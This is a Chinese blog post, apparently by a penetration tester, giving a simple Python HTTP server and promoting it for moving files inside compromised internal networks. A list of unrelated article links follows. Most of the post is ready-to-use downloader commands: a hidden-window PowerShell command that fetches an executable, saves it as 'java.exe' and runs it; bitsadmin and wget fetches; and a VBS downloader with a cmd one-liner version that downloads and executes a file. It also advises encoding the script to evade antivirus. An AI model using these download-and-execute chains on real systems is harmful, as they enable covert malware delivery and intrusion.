Python简易http服务器源码

import SimpleHTTPServer

import SocketServer

import sys

PORT = 80

if len(sys.argv) != 2:

print("use: web.exe port")

else:

PORT = int(sys.argv[1])

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer(("", PORT), Handler)

print "SimpleHTTPServer is ", PORT

print "by k8gege"

httpd.serve_forever()

用法:

python web.py 端口

web.exe 端口

访问: http://IP:端口

内网渗透

机器A:可上网

机器B:不联网

0x001 机器A文件传到机器B

使用方法,自行打包成可执行文件传到机器部署Web

然后在机器B上通过wget、VBS、Powershell等命令下载文件到机器B

0x002 机器B文件传到机器A

当然也可以反过来,将此程序上传到不可上网机器部部署web

再通过机器A下载机器B文件

0x003 速度

WGET内网下载速度高达70M/S

下载命令

下载者(隐藏窗口)

powershell -WindowStyle Hidden "IEX (New-Object Net.WebClient).DownloadFile('http://192.168.85.131/m.exe','c:\windows\temp\java.exe');Start-Process c:\windows\temp\java.exe"

系统自带bitsadmin下载文件(python简易WEB服务器不太友好,可能会报错)

bitsadmin /transfer n http://192.10.1.8/img/wget.exe C:\WINDOWS\Temp\wget.exe

VBS下载者

Set Post = CreateObject("Msxml2.XMLHTTP")

Set Shell = CreateObject("Wscript.Shell")

Post.Open "GET","http://192.168.25.128:13272/m.exe",0

Post.Send()

Set aGet = CreateObject("ADODB.Stream")

aGet.Mode = 3

aGet.Type = 1

aGet.Open()

aGet.Write(Post.responseBody)

afile = "java.exe"

aGet.SaveToFile afile,2

Shell.Run (afile)

如果仅有CMD权限,可用K8飞刀将VBS转成一行命令执行

如果有杀软也可通过随机ASCII码加密进行免杀(个别杀软不行了)

CMD命令-VBS下载者

del K8.vbs&echo Set Post = CreateObject("Msxml2.XMLHTTP") >> K8.vbs&&echo Set Shell = CreateObject("Wscript.Shell") >> K8.vbs&&echo Post.Open "GET","http://192.168.25.128:13272/m.exe",0 >> K8.vbs&&echo Post.Send() >> K8.vbs&&echo Set aGet = CreateObject("ADODB.Stream") >> K8.vbs&&echo aGet.Mode = 3 >> K8.vbs&&echo aGet.Type = 1 >> K8.vbs&&echo aGet.Open() >> K8.vbs&&echo aGet.Write(Post.responseBody) >> K8.vbs&&echo afile = "java.exe" >> K8.vbs&&echo aGet.SaveToFile afile,2 >> K8.vbs&&echo Shell.Run (afile) >> K8.vbs&&cscript K8.vbs&&del K8.vbs

以上命令可能不太方便,或者传输速度较慢,特别是侈传大文件的时候就知道了(不支持端口续传你就得重新下载)

我们可以通过以上方法将Wget先下载过去,再通过Wget下载文件

Wget下载(Linux自带,win需传过去)

wget -P /tmp http://39.109.6.128/cmd.txt

终极方法(cmd直接输出文件)

工具k8exe2bat:  https://www.cnblogs.com/k8gege/p/10585903.html

将任意文件转成BAT,通过Bat直接输出文件到目标,在条件非常奇葩的情况下可使用。

因为转出来的命令比较多,仅能执行CMD时会比较麻烦,如果可上传BAT执行还好

PS: 很简单但很多人不懂,特别是客户或新人,遇到不懂的直接发文章给他(可能工具还得编译好的)

当然如果内网自带WEB或其它可用文件传输工具,再自已弄个web进行文件传输就是SB了

python局域网大文件_[源码]Python简易http服务器(内网渗透大文件传输含下载命令)...相关推荐

  1. python复利终值_财码Python管理会计小实验—投融资管理之货币时间价值

    今天我们继续学习财码Python管理会计小实验之投融资管理篇,本章重点聊聊货币时间价值,望开卷有益. 知识点回顾 >>>货币的时间价值的含义 货币时间价值:指在不考虑风险和通货膨胀的 ...

  2. socket编程简单Demo讲解及源码分享(C# Winform 内网)

    首先是什么是socket编程? 推荐大家看百度百科的解释:https://baike.baidu.com/item/socket/281150?fr=aladdin 百科对于定义讲的很详细,就不再叙述 ...

  3. python中文聊天机器人_[源码和文档分享]基于python的中文聊天机器人

    前言 发布这篇 Chat 的初衷是想和各位一起分享一下动手来做聊天机器人的乐趣,因此本篇文章适合用于深度机器学习的研究和兴趣发展,因为从工业应用的角度来看使用百度.科大讯飞的 API 接口会更加的适合 ...

  4. jspxcms 4.0 mysql 5.0_Jspxcms4.0文件及源码目录结构说明

    Jspxcms文件及源码目录结构说明 文件结构说明 /back (后台资源文件夹,包括图片.js和css) /cmscp (用于解决tomcat的bug,无其他用处) /commons (公用资源文件 ...

  5. java class源码查看_eclipse查看class文件的源码

    eclipse查看class文件的源码: 1.网上下载jadClipse的jar包和执行文件jad.exe和 net.sf.jadclipse_3.3.0.jar. 2.把上面下载的jar包放在ecp ...

  6. Python GUI制作实例 wxPython使用多线程 防假死含wxFormBuilder的文件及源码

    wxFormBuilder使用的教程较少,网上的文件源码也少. 最近使用 python 写了一个GUI,可以打开设置文件,并对xlsx文件进行处理,可以将部分信息输出到gui界面,像print输出到c ...

  7. Python新闻推荐系统+爬虫+可视化 大数据项目 源码下载

    Python新闻推荐系统+爬虫+可视化 大数据项目 源码下载 网络爬虫:通过Python实现新浪新闻的爬取,可爬取新闻页面上的标题.文本.图片.视频链接 推荐算法:权重衰减+标签推荐+区域推荐+热点推 ...

  8. python源码图片_初学者用python爬凡客图片的源码

    python学习最大的动力就是能写出一些可以运行的代码.感觉python真是的很强大. 下边的这部分python代码是我用来爬凡客T的图片,代码是初学阶段写的,比较简陋,没做修改,之前是可以用的.翻出 ...

  9. python海龟编辑器中询问并获得输入咱弄出来的积木_源码图鉴

    # 海龟函数(2/2) 在源码编辑器中使用海龟函数即可连接海龟编辑器,由海龟编辑器负责处理数据及返回结果,源码编辑器负责调用数据及运行结果. 用户可使用Python语言定义源码积木,实现源码编辑器和海 ...

最新文章

  1. ASP.NET MVC 环境配置,从1.0到2.0的转换和学习资源等
  2. Android—多版本主要适配内容
  3. 2020 China Collegiate Programming Contest Qinhuangdao Site 补题部分
  4. 奇幻RPG(角色技能 与 Strategy模式)
  5. 拓端tecdat|R语言用有限混合模型(FMM,finite mixture model)创建衰退指标对股市SPY、ETF收益聚类和双坐标图可视化
  6. 网络规划设计师教程知识点精讲之计算机网络分类
  7. 机器人运动学轨迹跟踪控制(Matlab实现)
  8. 微信小程序tabBar图标大小64 * 64
  9. Android 应用中使用ContentObserver自动填写短信验证码
  10. 山西台达plc可编程控制器_PLC可编程控制器常见的应用领域
  11. linux SIGABRT信号
  12. Unity_粒子特效
  13. 阿里云个人站点基于nginx代理搭建https协议支持
  14. python学习——matplotlib使用之标注点学习
  15. linux系统安装hba驱动,RedHat Linux下的HBA驱动安装
  16. 配置coredns解析公网域名
  17. unity开发 斗地主算法—提示AI(提示出牌)
  18. 【永久免费】胜率95%,非常精准外汇mt4趋势波段指标,无未来(最新版)
  19. 八数码问题中的逆序数
  20. [4G5G专题-29]:物理层-内部架构、功能协议与主要接口概述

热门文章

  1. arm linux 中断 分析,armlinux中断异常的处理分析.pdf
  2. java asynccontext,超时后的JavaEE 6 AsyncContext行为
  3. Python 第三方模块之 imgaug (图像增强)
  4. win10开启oracle服务器配置,Windows环境(Win10)下安装、配置服务器类Oracle Database 11g Release 2...
  5. 快速入门Matplotlib
  6. python pip本地安装包_python-pip install 安装包
  7. C++静态成员函数指针
  8. 苹果应用上架,一些信息的勾选(2017年4月27日)
  9. linux servlet 乱码问题,Servlet一次乱码排查后的总结
  10. 关于毫米波技术的描述